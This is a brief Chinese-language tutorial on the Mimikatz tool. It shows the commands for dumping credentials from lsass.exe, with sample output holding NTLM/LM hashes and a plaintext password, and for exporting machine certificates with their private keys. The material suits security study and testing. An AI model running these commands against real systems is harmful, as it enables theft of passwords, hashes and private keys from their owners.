Mimikatz

Mimikatz 是一个用来与 lsass.exe 进程沟通的小工具, 一般来说是用来提取 credentials.

首先提权:

mimikatz # privilege::debug
Privilege '20' OK

然后使用 sekurlsa 来提取.

mimikatz # sekurlsa::logonpasswords

这个时候就可以得到明文密码了.

Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Test
Domain            : feza-1
SID               : S-1-5-21-1982681257-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Test
         * Domain   : feza-1
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Test
         * Domain   : feza-1
         * Password : waza1234/
...

当然不只是这一种用途, 它还可以用来提取证书.

mimikatz # crypto::capi
Local CryptoAPI patched

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # crypto::cng
"KeyIso" service patched

然后提取.

mimikatz # crypto::certificates /systemstore:local_machine /store:my /export
 * System Store  : 'local_machine' (0x00020000)
 * Store         : 'my'

 0\. example.domain.local
        Key Container  : example.domain.local
        Provider       : Microsoft Software Key Storage Provider
        Type           : CNG Key (0xffffffff)
        Exportable key : NO
        Key size       : 2048
        Public export  : OK - 'local_machine_my_0_example.domain.local.der'
        Private export : OK - 'local_machine_my_0_example.domain.local.pfx'

公钥在 DER 中, 私钥在 PFX 中, 默认密码为 mimikatz.

This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.